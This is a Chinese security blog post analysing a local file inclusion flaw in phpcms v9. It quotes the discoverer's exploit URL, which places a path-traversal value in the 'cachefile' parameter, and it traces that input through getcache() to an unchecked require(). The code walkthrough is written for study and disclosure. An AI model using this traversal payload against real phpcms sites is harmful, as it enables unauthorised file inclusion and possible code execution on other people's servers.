您的位置 » 首页 » 代码审计 » 代码审计:phpcms v9本地文件包含漏洞超详细分析

代码审计:phpcms v9本地文件包含漏洞超详细分析

发表于4年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年04月02日 | 文章热度:5,133 次 全屏阅读

显示不全请点击全屏阅读

 

漏洞作者: b4dboy
博客:http://www.secoff.net/
漏洞分析:Seay
博客:http://www.cnseay.com/
转载请保留以上版权内容。
昨天愚人节,在微博开了个玩笑说博客即将关闭,然后陆续收到朋友们的电话、短信、QQ消息、私信等来询问,还有不少朋友开始备份我博客文章。。。蛋疼。对不住啊,亲们。


b4dboy基友放出dedecms跟phpcmsv9的本地包含漏洞。Dedecms的漏洞我也做了详细分析,但是由于某些原因暂时不能放出来,等过两天能发的时候就发出来,蛋疼啊,有写好的文章因为某些原因又不能发,真的很郁闷很郁闷,繁琐的流程,具体的原因你们猜的到就猜吧。


   发一个phpcms v9的吧,相关描述在http://www.cnseay.com/2530/,感谢b4dboy基友的分享。
   根据作者放出的exp:
http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck


可以看出漏洞在get_menu.php文件的ajax_getlist()函数。我们跟进去看看。

 

function ajax_getlist() {

	$cachefile = $_GET['cachefile'];
	$path = $_GET['path'];
	$title = $_GET['title'];
	$key = $_GET['key'];
	$infos = getcache($cachefile,$path);
	$where_id = intval($_GET['parentid']);
	$parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);

OK,看到了exp中的cachefile参数
$cachefile = $_GET[‘cachefile’];
继续跟进,看到
$infos = getcache($cachefile,$path);

调用了getcache()函数,

在\phpcms\libs\functions\global.func.php 文件505行

 

/**
 * 读取缓存,默认为文件缓存,不加载缓存配置。
 * @param string $name 缓存名称
 * @param $filepath 数据路径(模块名称) caches/cache_$filepath/
 * @param string $config 配置名称
 */
function getcache($name, $filepath='', $type='file', $config='') {
	pc_base::load_sys_class('cache_factory','',0);
	if($config) {
		$cacheconfig = pc_base::load_config('cache');
		$cache = cache_factory::get_instance($cacheconfig)->get_cache($config);
	} else {
		$cache = cache_factory::get_instance()->get_cache($type);
	}
	return $cache->get($name, '', '', $filepath);
}

OK,很清楚的可以看到传进来的$name变量,即缓存名称最终进入了$cache->get($name, ”, ”, $filepath);。


在phpcms\libs\classes\cache_file.class.php 文件的get函数

 

public function get($name, $setting = '', $type = 'data', $module = ROUTE_M) {
		$this->get_setting($setting);
		if(empty($type)) $type = 'data';
		if(empty($module)) $module = ROUTE_M;
		$filepath = CACHE_PATH.'caches_'.$module.'/caches_'.$type.'/';
		$filename = $name.$this->_setting['suf'];//echo $filepath.$filename;exit();
		if (!file_exists($filepath.$filename)) {
			return false;
		} else {
		    if($this->_setting['type'] == 'array') {
		    	$data = @require($filepath.$filename);

 

我在上面加了个echo $filepath.$filename;exit();输出了路径,如图

 

 

很清楚了吧。例如包含的根目录的1.cache.php

 

 

 

如果你仔细看看同类的函数,会发现还有很多类似的。慢慢挖吧。

原创文章,转载请注明版权。

本文来自Seay博客,http://www.cnseay.com/

致力于web安全研究 程序开发 逆向分析。

Tags:

phpcmsv9漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2532/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • Seay 说:
    1楼
    2013 年 4 月 10 日 上午 2:12 回复

    老大 你一直说的 “Dedecms的漏洞我也做了详细分析,但是由于某些原因暂时不能放出来,等过两天能发的时候就发出来,”

    都这么长时间 怎么还不放呀? 😡 😡 😡

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)